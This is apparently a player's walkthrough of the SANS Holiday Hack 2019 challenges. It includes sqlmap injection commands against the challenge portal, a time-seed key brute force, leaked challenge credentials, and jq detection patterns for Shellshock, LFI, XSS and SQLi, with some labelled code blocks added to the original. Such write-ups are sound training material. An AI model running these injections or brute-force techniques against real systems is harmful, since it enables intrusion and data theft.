I enjoyed this year's challenges a lot! A couple of the objectives had me stumped for a bit, especially in the areas I am not strong in, but that is why these all-rounder events are great for brushing up your skills.
Thanks to the team at SANS for spending the time and effort hosting the event every year!
Main Objectives
- 0. Talk to Santa in the Quad
- 1. Find the Turtle Doves
- 2. Unredact Threatening Document
- 3. Windows Log Analysis: Evaluate Attack Outcome
- 4. Windows Log Analysis: Determine Attacker Technique
- 5. Network Log Analysis: Determine Compromised System
- 6. Splunk
- 7. Get Access To The Steam Tunnels
- 8. Bypassing the Frido Sleigh CAPTEHA
- 9. Retrieve Scraps of Paper from Server
- 10. Recover Cleartext Document
- 11. Open the Sleigh Shop Door
- 12. Filter Out Poisoned Sources of Weather Data
Other Challenges
- Escape Ed — Bushy Evergreen
- Frosty Keypad — Tangle Coalbox
- Greylog — Pepper Minstix
- Linux Path — SugarPlum Mary
- Xmas Laser Cheer — Sparkle Redberry
- Holiday Hack Trail — Minty Candy Cane
- Smart Braces — Kent Tinseltooth
- Mongo Pilfter — Holly Evergreen
- Nyanshell — Alabaster Snowball
- Zeek JSON Logs — Wunorse Openslae
Main Objectives
0. Talk to Santa in the Quad
Make your way outside and speak to Santa.
1. Find the Turtle Doves
From the Quad, head to one of the north entrances to find the doves.
2. Unredact Threatening Document
The letter was a little hard to find but is located in the top left corner of the quad. This links you to the document, LetterToElfUPersonnel.pdf.
Simply select all the text and copy it to a text editor to see what was underneath the red boxes:
Date: February 28, 2019
To the Administration, Faculty, and Staff of Elf University
17 Christmas Tree Lane
North Pole
From: A Concerned and Aggrieved Character
Subject: DEMAND: Spread Holiday Cheer to Other Holidays and Mythical Characters… OR ELSE!
Attention All Elf University Personnel,
It remains a constant source of frustration that Elf University and the entire operation at the North Pole focuses exclusively on Mr. S. Claus and his year-end holiday spree. We URGE you to consider lending your considerable resources and expertise in providing merriment, cheer, toys, candy, and much more to other holidays year-round, as well as to other mythical characters.
For centuries, we have expressed our frustration at your lack of willingness to spread your cheer beyond the inaptly-called “Holiday Season.” There are many other perfectly fine holidays and mythical characters that need your direct support year-round.
If you do not accede to our demands, we will be forced to take matters into our own hands. We do not make this threat lightly. You have less than six months to act demonstrably.
Sincerely,
— A Concerned and Aggrieved Character
Answer: DEMAND
3. Windows Log Analysis: Evaluate Attack Outcome
I use a tool called Event Log Explorer to quickly look at Windows event logs.
The time frame for this export is pretty small so we can just look at 4624 events (successful logons).
Answer: supatree
4. Windows Log Analysis: Determine Attacker Technique
First I converted the JSON to CSV to be able to sort a bit better.
I noticed that ntdsutil (one way to dump creds from Active Directory) was used and it turned out to be correct!
Answer: ntdsutil
5. Network Log Analysis: Determine Compromised System
Working with Zeek logs, I used the bro-cut utility to select the fields I’m looking for. Here are some good searches to look at in the conn logs:
Long Connection Times
> cat conn* | bro-cut id.orig_h id.resp_h duration | datamash -s -g 1,2 sum 3 | sort -k 3 -rn | head -10
Count number of connections per source>dest IPs
> cat conn* | bro-cut id.orig_h id.resp_h | sort | uniq -c | sort -rn | head -10
There was a large number of files (file logs) transferred between two hosts that stood out from the rest of the traffic. This could be indicative of C2 heartbeats.
Number of files transfered between hosts
> cat file* | bro-cut tx_hosts rx_hosts source mime_type | grep -v SSL | sort -rn | uniq -c | sort -rn | head -10
7643 192.168.134.130 144.202.46.214 HTTP text/plain
7643 144.202.46.214 192.168.134.130 HTTP text/html
Let's have a look at the http log to see if we can find anything else on that destination IP 144.202.46.214:
> cat http* | bro-cut id.orig_h id.resp_h domain uri | grep 144.202.46.214 | sort | uniq -c
7643 192.168.134.130 144.202.46.214 /504vsa/server/vssvc.php
The host 192.168.134.130 connected to this suspicious php URI 7643 times according to the http logs.
If we go back to the conn logs and grep on our suspected destination host, we can see that the connections occur every 10 seconds on the dot (use -d in bro-cut to convert the epoch timestamp to a readable one). This is a pretty good sign of a C2 connection.
> cat conn* | bro-cut -d ts id.orig_h id.resp_h | grep 144.202.46.214 | head -5
2019-08-23T22:00:21+1000 192.168.134.130 144.202.46.214
2019-08-23T22:00:31+1000 192.168.134.130 144.202.46.214
2019-08-23T22:00:41+1000 192.168.134.130 144.202.46.214
2019-08-23T22:00:51+1000 192.168.134.130 144.202.46.214
2019-08-23T22:01:01+1000 192.168.134.130 144.202.46.214
The source IP of these connections turned out to be the right answer.
Answer: 192.168.134.130
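The cadence check from the conn logs written out as detection code. This is an added example and not part of the original write-up; it assumes tab-separated Zeek conn.log records with a #fields header, and the rows below are constructed sample data.

```python
"""Flag fixed-interval beaconing in Zeek conn.log records.

Added example (not from the original write-up): it turns the "every 10 seconds
on the dot" observation into a check, grouping connections per source/destination
pair and measuring how regular the inter-arrival gaps are.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample, not real capture data: a 10-second beacon to the IP
# named in the write-up, plus irregular traffic to a documentation-range IP.
SAMPLE_CONN_LOG = "\n".join([
    "#separator \\x09",
    "#fields\tts\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tduration",
    "1566597621.000\t192.168.134.130\t49211\t144.202.46.214\t80\ttcp\t0.12",
    "1566597631.000\t192.168.134.130\t49212\t144.202.46.214\t80\ttcp\t0.11",
    "1566597641.000\t192.168.134.130\t49213\t144.202.46.214\t80\ttcp\t0.13",
    "1566597651.000\t192.168.134.130\t49214\t144.202.46.214\t80\ttcp\t0.12",
    "1566597661.000\t192.168.134.130\t49215\t144.202.46.214\t80\ttcp\t0.10",
    "1566597622.300\t192.168.134.130\t49220\t203.0.113.10\t443\ttcp\t3.40",
    "1566597629.900\t192.168.134.130\t49221\t203.0.113.10\t443\ttcp\t0.50",
    "1566597655.100\t192.168.134.130\t49222\t203.0.113.10\t443\ttcp\t12.1",
    "1566597702.700\t192.168.134.130\t49223\t203.0.113.10\t443\ttcp\t0.90",
    "#close 2019-08-23-22-05-00",
])


def parse_conn_log(text):
    """Parse Zeek TSV into dicts keyed by the names in the #fields header;
    other '#' lines (separator, open, close) are skipped."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            records.append(dict(zip(fields, line.split("\t"))))
    return records


def beacon_candidates(records, min_connections=4, max_jitter=0.05):
    """Return {(orig_h, resp_h): (mean_gap_seconds, count)} for pairs whose
    inter-arrival gaps are nearly constant: population std dev divided by the
    mean gap is at or below max_jitter. Genuine browsing has much larger jitter."""
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r["id.orig_h"], r["id.resp_h"])].append(float(r["ts"]))
    flagged = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            flagged[pair] = (round(avg, 3), len(stamps))
    return flagged


if __name__ == "__main__":
    for (src, dst), (gap, n) in beacon_candidates(parse_conn_log(SAMPLE_CONN_LOG)).items():
        print(f"{src} -> {dst}: {n} connections every {gap} s (possible C2 beacon)")
```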
6. Splunk
(Jump to Question 8 for answer to this objective)
We are shown a chat app that introduces a couple of characters and also some questions.
Training Questions
1. What is the short host name of Professor Banas’ computer?
As prompted, the #ELFU SOC channel tells us the answer.
Answer: sweetums
2. What is the name of the sensitive file that was likely accessed and copied by the attacker? Please provide the fully qualified location of the file.
Looking around, there was a suspicious powershell block running that was looking for files to do with Santa.
Answer: C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt
3. What is the fully-qualified domain name (FQDN) of the command and control (C2) server?
In the same set of powershell logs, there was a block of base64 encoded text.
After decoding the block, we have a bit more of an idea of what commands were run. Towards the end, a web call is being constructed and sent to this IP:
http://144.202.46.214:8080
Using the Sysmon logs, we can also see the network connections made by powershell.
Answer: 144.202.46.214.vultr.com
4. What document is involved with launching the malicious PowerShell code?
We can work backward to find what called powershell and then what document was part of that call.
Using the time range of the initial powershell call, there was a winword.exe that loaded a WMI DLL. We can assume the macro used WMI to create the powershell process, as the parent process was wmiprvse.exe.
Pivoting off the timestamp, I looked at the File Created events in sysmon. The Professor opened a zip file from his mail that contained a macro-enabled document just before the powershell events.
Answer: 19th Century Holiday Cheer Assignment.docm
5. How many unique email addresses were used to send Holiday Cheer essays to Professor Banas?
There were 42 unique values in the “results{}.workers.smtp.from” field, but half of those were lowercase duplicates.
Answer: 21
6. What was the password for the zip archive that contained the suspicious file?
If we go back to the malicious file, Buttercups_HOL404_assignment.zip, and look at any other related events, we find the submission email from Bradly Buttercups <Bradly.Buttercups@eIfu.org>.
In the email, the attacker gives us the password.
Answer: 123456789
7. What email address did the suspicious file come from?
Answer: Bradly.Buttercups@eIfu.org
Sidenote: It also looks like the SPF check of the email didn’t trust the sender IP either.
softfail (protection.outlook.com: domain of transitioning eifu.org discourages use of 144.202.46.214 as permitted sender)
This IP is the same as the C2 server identified before.
8. (Main question) What was the message for Kent that the adversary embedded in this attack?
Using the hints from Alice, we need to find the document from the last question in the File Archive. stoQ is the metadata analyser, and we need to match the path of the property to the file path.
A Word document is made up of many .xml documents, and core.xml (as hinted by Alice) is the one that contains the main metadata of the Word document.
core.xml (19th Century Holiday Cheer Assignment.docm)...
<dc:title>Holiday Cheer Assignment</dc:title>
<dc:subject>19th Century Cheer</dc:subject>
<dc:creator>Bradly Buttercups</dc:creator>
<cp:keywords></cp:keywords>
<dc:description>Kent you are so unfair. And we were going to make you the king of the Winter Carnival.</dc:description>
<cp:lastModifiedBy>Tim Edwards</cp:lastModifiedBy>
...
Answer: Kent you are so unfair. And we were going to make you the king of the Winter Carnival.
7. Get Access To The Steam Tunnels
When trying to find the steam tunnels for the next challenge, I found a suspicious looking man running into a room that was empty when I chased after him. On his belt he had a curious key. In the original room there is a key cutter machine.
If we test the cutter and print out something like 1 2 3 4 5 6, we can see that it generates a key with the divots getting deeper as the number gets higher.
Comparing the divots to the image of the man and attempting a few combinations I was able to recreate the key. Overlaying the image onto the target helped a lot.
Key cutter combination: 122520
We gain entry to the steam tunnels and talk to Krampus. He admits he was the one that borrowed the turtle doves.
Answer: Krampus Hollyfeld
8. Bypassing the Frido Sleigh CAPTEHA
The goal of this challenge is to solve the image challenge in the extremely short time given. Talking to Krampus provides some pre-defined images and an API script.
The steps for this challenge are:
- Create ML model from pre-classified images
- Get CAPTeHA Challenge images and save them to disk
- Classify challenge images against model
- If image is one of the 3 categories the CAPTeHA requests, add to array and then send the response back to the server
Heavily borrowed code from: https://github.com/chrisjd20/img_rec_tf_ml_demo (Provided in one of the hint talks)
My resulting code was a mix between captecha_api.py and predict_images_using_trained_model.py from the link above.
I first ran retrain.py on the collection of pre-classified images from Krampus.
I used captecha_api.py as my base code and copied functions from predict_images_using_trained_model.py.
Full script: https://pastebin.com/SXXpHBPg
I had a problem with the request timing out, but after I increased the threading, it was successful in submitting heaps of requests, resulting in:
9. Retrieve Scraps of Paper from Server
In the next challenge, we need to exploit the web app form to get access to a file on the server.
If you have completed the Graylog challenge, the hint points you in the direction of SQLi.
Playing around with some requests, it looks like this page may be injectable but requires a token.
/application-check.php?elfmail=<test@email.com>&token=<token>
Also, looking at the traffic in the network tab, a request is made to /validator.php which returns a token. This seems to be a CSRF token that we need to get before submitting our request.
I created a custom rule to extract this field in Burp Suite.
I've added studentportal.elfu.org to the scope of my macro, so this runs whenever we request /application-check.php.
/application-check.php?elfmail=test@email.com';&token=value
I added '; in the elfmail field to trigger the SQL error.
sqlmap --proxy=http://localhost:8080 --url="https://studentportal.elfu.org/application-check.php?elfmail=test@email.com&token=test" -p elfmail
To check on the macro, open up the session handling tracer and see how the token request is issued.
We can now use SQLMap with the --dump flag added to the above command.
-D database_name
[07:13:23] [INFO] fetching tables for database: 'elfu'
[07:13:23] [INFO] used SQL query returns 3 entries
[07:13:23] [INFO] resumed: 'applications'
[07:13:23] [INFO] resumed: 'krampus'
[07:13:23] [INFO] resumed: 'students'
-T table_name
Database: elfu
Table: krampus
[6 entries]
+----+-----------------------+
| id | path |
+----+-----------------------+
| 1 | /krampus/0f5f510e.png |
| 2 | /krampus/1cc7e121.png |
| 3 | /krampus/439f15e6.png |
| 4 | /krampus/667d6896.png |
| 5 | /krampus/adb798ca.png |
| 6 | /krampus/ba417715.png |
+----+-----------------------+
Full command:
sqlmap --proxy=http://localhost:8080 --url="https://studentportal.elfu.org/application-check.php?elfmail=test@email.com&token=test" -p elfmail -D elfu -T krampus --dump
If we download the images listed in the krampus table above (eg: https://studentportal.elfu.org/krampus/<id>.png) and try to put them back together, you get something like this:
There is a piece missing, but it is enough to provide the answer for the question.
Answer: Super Sled-o-Matic
10. Recover Cleartext Document
I started this challenge by opening up the elfscrow binary to see what it could do. There were a few mentions of Wireshark being able to sniff the encryption method, which may tell me more details.
While running the executable in encrypt mode multiple times, I quickly noticed the seed generated seemed to be the time in epoch.
Example: Seed = 1578090117
During the execution of the above, we can see the encryption key being sent in a POST request to /api/store, which then responds with a secret key value.
When we decrypt the file, the reverse happens: we send the secret to /api/retrieve and get the key back.
After spending a bit of time in Ghidra looking at the decompiled code for elfscrow.exe, there were a couple of functions that I identified and renamed which look important.
generatekey()
This function appears to get the seed (epoch time) and call a random number generator, weirdbitsstuff() to create an 8 byte long string.
weirdbitsstuff()
This short function seems to generate “random” hex bytes and return them to the generatekey() function. I've simplified it here:
random = seed
random = random * 0x343fd + 0x269ec3;
return random >> 0x10 & 0x7fff;
The main encrypt() function also shows us the steps that are used to encrypt the files.
So now we know the following:
- Seed is generated on time
- How the “random” number generator works
- Encryption is DES-CBC
We can now brute force the key generation function to recreate the encryption key for any date, if we know the time the file was encrypted.
We don’t need the UUID from the elfscrow server because we are skipping that step and decrypting the file directly.
The challenge says “Recover the plaintext content for this encrypted document. We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC.”
So we have a timeframe and can now attempt to brute force the key because the seeds will be from 1575658800 to 1575666000.
I based the crypto part of my code off: https://gist.github.com/forkd/168c9d74b988391e702aac5f4aa69e41
The rest are the functions that generate the key and attempt to decrypt.
Running this created many files, but my solution was to run grep -a "PDF" ElfUResearch_* over the files to find a successfully decrypted PDF:
The correct key seemed to be b5ad6a321240fbec and when opened we get our PDF!
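The seed-to-key step and the seed window written out, as an added example (not the author's script or the elfscrow code). It assumes that each key byte is the low byte of one generator output, and it leaves the DES-CBC call to a caller-supplied function because DES is not in Python's standard library.

```python
"""Enumerate the key space of elfscrow's time-seeded key generator.

Added example, not the challenge's or the author's code. It implements the
generator recovered in the write-up (state = state * 0x343fd + 0x269ec3,
output = (state >> 16) & 0x7fff, which is the MSVC rand() LCG) and ASSUMES that
each of the 8 DES key bytes is the low byte of one generator output. The DES
step itself is a caller-supplied decrypt function; the write-up did that step
with a decryption loop and grep over the output files.
"""
from datetime import datetime, timezone

MULT, INC, MASK32 = 0x343FD, 0x269EC3, 0xFFFFFFFF


class WeirdBitsRng:
    """The write-up's weirdbitsstuff(): a 32-bit LCG returning bits 16..30."""

    def __init__(self, seed):
        self.state = seed & MASK32

    def next(self):
        self.state = (self.state * MULT + INC) & MASK32
        return (self.state >> 16) & 0x7FFF


def key_from_seed(seed):
    """generatekey(): 8 bytes from 8 outputs (assumption: low byte of each)."""
    rng = WeirdBitsRng(seed)
    return bytes(rng.next() & 0xFF for _ in range(8))


def seed_window(start_utc, end_utc):
    """Inclusive range of epoch-second seeds for an encryption-time window."""
    return range(int(start_utc.timestamp()), int(end_utc.timestamp()) + 1)


def candidate_keys(start_utc, end_utc):
    """Every key the generator can produce inside the window: {key: seed}."""
    return {key_from_seed(s): s for s in seed_window(start_utc, end_utc)}


def seed_for_key(key_hex, start_utc, end_utc):
    """Recover the encryption time (seed) that yields a known key, or None."""
    return candidate_keys(start_utc, end_utc).get(bytes.fromhex(key_hex))


def brute_force(decrypt, ciphertext, start_utc, end_utc, magic=b"%PDF"):
    """Try every candidate key; return (seed, key) for the first plaintext that
    starts with `magic`. decrypt(key, ciphertext) -> bytes is caller-supplied,
    e.g. DES-CBC from a crypto library, matching the cipher elfscrow uses."""
    for seed in seed_window(start_utc, end_utc):
        key = key_from_seed(seed)
        if decrypt(key, ciphertext).startswith(magic):
            return seed, key
    return None


# The window stated in the challenge: 6 Dec 2019, 19:00 to 21:00 UTC.
WINDOW_START = datetime(2019, 12, 6, 19, 0, tzinfo=timezone.utc)
WINDOW_END = datetime(2019, 12, 6, 21, 0, tzinfo=timezone.utc)

if __name__ == "__main__":
    seeds = seed_window(WINDOW_START, WINDOW_END)
    # A two-hour window is only 7201 keys: trivial to try, which is the
    # whole weakness of seeding a key generator with the wall clock.
    print(f"{len(seeds)} candidate seeds ({seeds.start}..{seeds.stop - 1})")
    print("key for seed 1:", key_from_seed(1).hex())
```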
Note: I tried opening the pdf on Mac OS but it said it was corrupted. I had to jump into Kali to get it to open.
Answer: Machine Learning Sleigh Route Finder
11. Open the Sleigh Shop Door
We find the door next to Shiny Upatree, and if you inspect the door it leads to the page: https://sleighworkshopdoor.elfu.org/
Lock 1: You don’t need a clever riddle to open the console and scroll a little.
Answer: Open the console in your web dev tools and it will provide a code.
Lock 2: Some codes are hard to spy, perhaps they’ll show up on pulp with dye?
Answer: The hints for this one tell you to use print preview to get the answer.
Lock 3: This code is still unknown; it was fetched but never shown.
Answer: Check the network tab for an image that was downloaded.
Lock 4: Where might we keep the things we forage? Yes, of course: Local barrels!
Answer: Look at the local storage for the page.
Lock 5: Did you notice the code in the title? It may very well prove vital.
Answer: Type document.title in the console or hover over the tab bar
Lock 6: In order for this hologram to be effective, it may be necessary to increase your perspective.
Answer: Inspect element and increase the perspective css property.
Lock 7: The font you’re seeing is pretty slick, but this lock’s code was my first pick.
Answer: Inspect the element to see the font family
Lock 8: In the event that the .eggs go bad, you must figure out who will be sad.
Answer: Inspect the eggs element and notice an event handler for spoil. There is JS code that will set window['VERONICA'] to 'sad'. VERONICA is the key.
Lock 9: This next code will be unredacted, but only when all the chakras are :active.
Answer: We need to find all the elements with the “chakra” class and add the :active pseudo class.
Lock 10: Oh, no! This lock’s out of commission! Pop off the cover and locate what’s missing.
Answer: This requires moving a lot of <div> elements around.
If you first try to move the cover, it will reveal a circuit with a small code on the bottom right hand corner. If you try this code you will get an error in the console.
You can search for the key components in the DOM tree and drag the <div> to the last lock. Repeating this step, you find the “circuit” requires “Macaroni”, “Gnome” and “Swab”.
Answer: The Tooth Fairy
12. Filter Out Poisoned Sources of Weather Data
Sleigh Route Finder: https://srf.elfu.org/
Zeek logs: https://downloads.elfu.org/http.log.gz
cat http.log | jq -r '.[] | .uri' | sort -u
Using the above command, I was able to find some interesting pages.
https://srf.elfu.org/README.md
https://srf.elfu.org/santa.html
And more. Many pages return a “401 — Unauthorized srfsession Cookie”, but the README gives us creds.
admin:924158F9522B3744F5FCD4D10FAC4356
We can now use the portal to block the attacker IPs.
The hint from Wunorse Openslae indicates we should be looking at LFI, XSS, Shellshock, and SQLi attacks. Let's create the jq queries to filter the traffic.
LFI:
cat http.log | jq '.[] | select (.uri | contains ("/../"))| ."id.orig_h"' >> malicious_ip.txt
cat http.log | jq '.[] | select (.uri | contains ("pass"))| ."id.orig_h"' >> malicious_ip.txt
XSS:
cat http.log | jq '.[] | select (.uri | contains ("<")) | ."id.orig_h"' >> malicious_ip.txt
cat http.log | jq '.[] | select (.host | contains ("<")) | ."id.orig_h"' >> malicious_ip.txt
Shellshock:
cat http.log | jq '.[] | select (.user_agent | contains (":; };"))| ."id.orig_h"' >> malicious_ip.txt
SQLi:
cat http.log | jq '.[] | select (.user_agent | contains ("'"'"'"))| ."id.orig_h"' >> malicious_ip.txt
cat http.log | jq '.[] | select (.uri | contains ("'"'"'"))| ."id.orig_h"' >> malicious_ip.txt
cat http.log | jq '.[] | select (.username | contains ("'"'"'"))| ."id.orig_h"' >> malicious_ip.txt
cat malicious_ip.txt | sort | uniq
I used this list of IPs to create a pivot query to get malicious user agents.
Using the user agents, we can obtain more IPs. I did do a bit of trial and error as some of the user agents in the malicious list were actually benign.
while read useragents; do cat http.log | jq '.[] | select (.user_agent == '"$useragents"')'; done < mal_useragents.txt > pivotuseragents.txt
Using this, you can select the id.orig_h field to find more attacker IPs.
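The same indicator filters and the user-agent pivot in one script, as an added example that is not the write-up's own jq. Field names follow the page, the records are constructed, and the benign-agent list stands in for the trial-and-error step described above.

```python
"""Pick attacking source IPs out of a Zeek http.log exported as a JSON array,
then pivot on User-Agent, the way the jq one-liners in the write-up do.

Added example, not the write-up's own commands. It reuses the same indicator
strings (/../ and pass for LFI, < for XSS, ":; };" for Shellshock, a single
quote for SQLi) over constructed records with the field names on this page.
"""
import json
from collections import defaultdict

# Constructed records using RFC 5737 documentation addresses, not the real log.
SAMPLE_HTTP_LOG = json.dumps([
    {"id.orig_h": "203.0.113.5", "host": "srf.elfu.org", "uri": "/api/login",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0)", "username": "-"},
    {"id.orig_h": "198.51.100.7", "host": "srf.elfu.org",
     "uri": "/api/weather?station=1'",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0)", "username": "-"},
    {"id.orig_h": "198.51.100.8", "host": "srf.elfu.org",
     "uri": "/api/../../etc/passwd",
     "user_agent": "HolidayCheer-Scanner/0.1", "username": "-"},
    {"id.orig_h": "198.51.100.9", "host": "<script>alert(1)</script>", "uri": "/",
     "user_agent": "HolidayCheer-Scanner/0.1", "username": "-"},
    {"id.orig_h": "198.51.100.10", "host": "srf.elfu.org", "uri": "/cgi-bin/status",
     "user_agent": "() { :; }; echo", "username": "-"},
    {"id.orig_h": "198.51.100.11", "host": "srf.elfu.org",
     "uri": "/api/weather?station=5",
     "user_agent": "HolidayCheer-Scanner/0.1", "username": "-"},
    {"id.orig_h": "203.0.113.6", "host": "srf.elfu.org",
     "uri": "/api/weather?station=2",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0)", "username": "-"},
])


def parse_http_log(log_json):
    """The log is one JSON array of records (hence jq's '.[]')."""
    return json.loads(log_json)


def field(record, name):
    """Zeek omits unset fields; treat a missing field as the empty string
    instead of failing the way jq's contains() does on null."""
    return record.get(name) or ""


INDICATORS = {
    "lfi": lambda r: "/../" in field(r, "uri") or "pass" in field(r, "uri"),
    "xss": lambda r: "<" in field(r, "uri") or "<" in field(r, "host"),
    "shellshock": lambda r: ":; };" in field(r, "user_agent"),
    "sqli": lambda r: any("'" in field(r, f) for f in ("user_agent", "uri", "username")),
}


def classify(records):
    """{source ip: {indicator names}} for every record matching an indicator."""
    hits = defaultdict(set)
    for r in records:
        for name, matches in INDICATORS.items():
            if matches(r):
                hits[r["id.orig_h"]].add(name)
    return dict(hits)


def pivot_user_agents(records, bad_ips, benign_agents=()):
    """Collect the UAs used by flagged IPs (minus those judged benign) and
    return every IP that used one of them, plus the UA set itself. Without the
    benign list a shared browser UA drags legitimate clients into the block list,
    which is the false-positive problem the write-up mentions."""
    bad_uas = {field(r, "user_agent") for r in records if r["id.orig_h"] in bad_ips}
    bad_uas -= set(benign_agents)
    pivoted = {r["id.orig_h"] for r in records if field(r, "user_agent") in bad_uas}
    return pivoted, bad_uas


def block_list(log_json, benign_agents=()):
    """Sorted union of direct indicator hits and UA-pivot hits."""
    records = parse_http_log(log_json)
    direct = classify(records)
    pivoted, _ = pivot_user_agents(records, set(direct), benign_agents)
    return sorted(set(direct) | pivoted)


if __name__ == "__main__":
    for ip in block_list(SAMPLE_HTTP_LOG, benign_agents=["Mozilla/5.0 (Windows NT 10.0)"]):
        print("block", ip)
```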
In the end, there were around 126 IPs I entered into the API to block, but I have heard some people only needed 95 IPs to complete the challenge.
Once the route successfully loaded, we are given the answer.
Answer: 0807198508261964
In the last room we find Santa with some dialogue to tie everything up. There is a suspicious note in the corner that may hint at next year's challenge!
Other Challenges
Escape Ed — Bushy Evergreen
Answer: q
(Exit command for the Ed editor)
Frosty Keypad — Tangle Coalbox
Hint: One digit is repeated once, it’s prime, and you can see which keys were used
The keypad suggests the digits 1, 3 and 7 are used. 3 and 7 are the two primes.
I tried 1337 and then 7331 and it worked… If that wasn’t right, I was planning on generating the combos. Always try the obvious answers just in case!
Answer: 7331
Greylog — Pepper Minstix
Question 1: Minty CandyCane reported some weird activity on his computer after he clicked on a link in Firefox for a cookie recipe and downloaded a file.
What is the full-path + filename of the first malicious file downloaded by Minty?
Let’s look through the file creations from the process firefox.exe.
Answer: C:\Users\minty\Downloads\cookie_recipe.exe
Question 2: The malicious file downloaded and executed by Minty gave the attacker remote access to his machine. What was the ip:port the malicious file connected to first?
We can look at the network connections created from the cookie_recipe.exe process.
Answer: 192.168.247.175:4444
Question 3: What was the first command executed by the attacker?
Using ParentProcessCommandLine: “C:\Users\minty\Downloads\cookie_recipe.exe”, there were a number of commands run, but sorting by timestamp gives us the answer.
Answer: whoami
Question 4: What is the one-word service name the attacker used to escalate privileges?
There were other processes spawned from cookie_recipe.exe that were of interest from the previous questions. One of them created a service that would use WMI to start a process.
Answer: webexservice
Question 5: What is the file-path + filename of the binary ran by the attacker to dump credentials?
Now that the attacker has escalated privileges, they attempted to run mimikatz. When submitting C:\mimikatz.exe, you are told it's the wrong answer, so further digging was required.
Looking at the process created logs, there was an event not long after the one above that used the same command line arguments as mimikatz does, from a process called cookie.exe.
Answer: C:\cookie.exe
Question 6: The attacker pivoted to another workstation using credentials gained from Minty’s computer. Which account name was used to pivot to another machine?
I first looked at successful logons (EventID:4624) and specifically RDP or remote-based logons (LogonType:10) from the attacker IP 192.168.247.175. This only returned one event…
Answer: alabaster
Question 7: What is the time ( HH:MM:SS ) the attacker makes a Remote Desktop connection to another machine?
We have already found this from the last question looking at logon type 10 events.
Answer: 06:04:28
Question 8: The attacker navigates the file system of a third host using their Remote Desktop Connection to the second host. What is the SourceHostName,DestinationHostname,LogonType of this connection?
I looked for SMB connections from the workstation that was RDP-ed to, to potentially highlight file browsing. There were several between workstation 2 and workstation 3. I then looked at EventID:4624 to confirm that there was a successful logon at the same time.
Answer: elfu-res-wks2,elfu-res-wks3,3
Question 9: What is the full-path + filename of the secret research document after being transferred from the third host to the second host?
Staying on elfu-res-wks2, I noticed a suspicious powershell command reading a file called super_secret_elfu_research.pdf.
Answer: C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf
Question 10: What is the IPv4 address (as found in logs) the secret research document was exfiltrated to?
By the looks of the logs from the last question, it was uploaded to pastebin.com. The next network event gives us the IP.
Answer: 104.22.3.84
Linux Path — SugarPlum Mary
Let’s check what “ls” we are actually using with the “which” command.
Let's try the version of ls in /bin/ … okay!
Answer: /bin/ls
Xmas Laser Cheer — Sparkle Redberry
We are given a powershell terminal to fix the laser's configuration and something about a note. The note callingcard.txt hinted at the history for this challenge. Let's have a look:
The 7th entry is the value for the laser angle, angle?val=65.5.
The 9th entry seems to talk about variables. Let's have a look at the environment variables set:
The “riddle” environment variable looks like we are on the right track.
The most recent file in /etc/ seems to be an archive /etc/apt/archive.
The magic byte of this file is PK — a zip file.
I unzipped the file and the next hint refers to a hash that can lead us to the next clue. We will need to recursively hash each file until we get a match.
Before that, let's look at the executable called runme.elf. The file mode won't let us run it until we change the attribute, but once we do, we have the refraction value.
Here is the command I ran to find the matching file:
$x = Get-ChildItem depths -recurse | where { (Get-FileHash -Path $_.FullName -Algorithm MD5).hash -eq "25520151A320B5B0D21561F92C8F6224"}
We now have one of the values to config the laser to: temperature?val=-33.5
The next step was finding the file with the longest name. My query ended up being a bit messy but this was the end result after a lot of fiddling:
Get-ChildItem -Path depths -Recurse -Force | Select-Object -Property FullName, @{Name="FullNameLength";Expression={($_.FullName.Length)}} | Sort-Object -Property FullNameLength -Descending | Select -First 1 | fl
Which gave the result:
FullName : /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt
FullNameLength : 388
Outputting the file above gives us the next hint:
Get process information to include Username identification. Stop Process to show me you're skilled and in this order they must be killed:
bushy
alabaster
minty
holly
Do this for me and then you /shall/see .
I killed the processes in order of their username.
This allowed us to access a folder /shall. In there the file see had the next step.
/shall/see
Get the .xml children of /etc — an event log to be found. Group all .Id’s and the last thing will be in the Properties of the lonely unique event Id.
Looks like we need to find an event id that is unique.
The event file is located /etc/systemd/system/timers.target.wants/EventLog.xml
$xml = [xml](get-content /etc/systemd/system/timers.target.wants/EventLog.xml)
After spending a while looking at the structure of the XML file, I used several helpful queries.
Load xml file in var
[xml]$xml = get-content /etc/systemd/system/timers.target.wants/EventLog.xml
Count by Event Id
$xml.objs.obj.Props.i32 | where {$_.N -eq "Id"} | group '#text'
TaskDisplayName
$name = $xml.Objs.Obj.Props.S | ? {$_.N -like "TaskDisplayName"}
Properties
$props = $xml.Objs.Obj.Props.Obj | ? {$_.N -like "Properties"}
$props.LST.Obj.Props.S | select '#text'
Message
$msg = $xml.Objs.Obj.MS.S | ? {$_.N -like "Message"}
Select Event with Id=1
$xml.objs.obj.Props | where {$_.I32.'#text' -eq "1"} | select *
In the event with the ID=1, there is a powershell command with the correct gas values:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "`$correct_gases_postbody = @{`n O=6`n H=7`n He=3`n N=4`n Ne=22`n Ar=11`n Xe=10`n F=20`n Kr=8`n Rn=9`n}`n"
Now we can reconfigure the laser and check the output.
(Invoke-WebRequest -Uri http://localhost:1225/api/angle?val=65.5).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/temperature?val=-33.5).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/refraction?val=1.867).RawContent
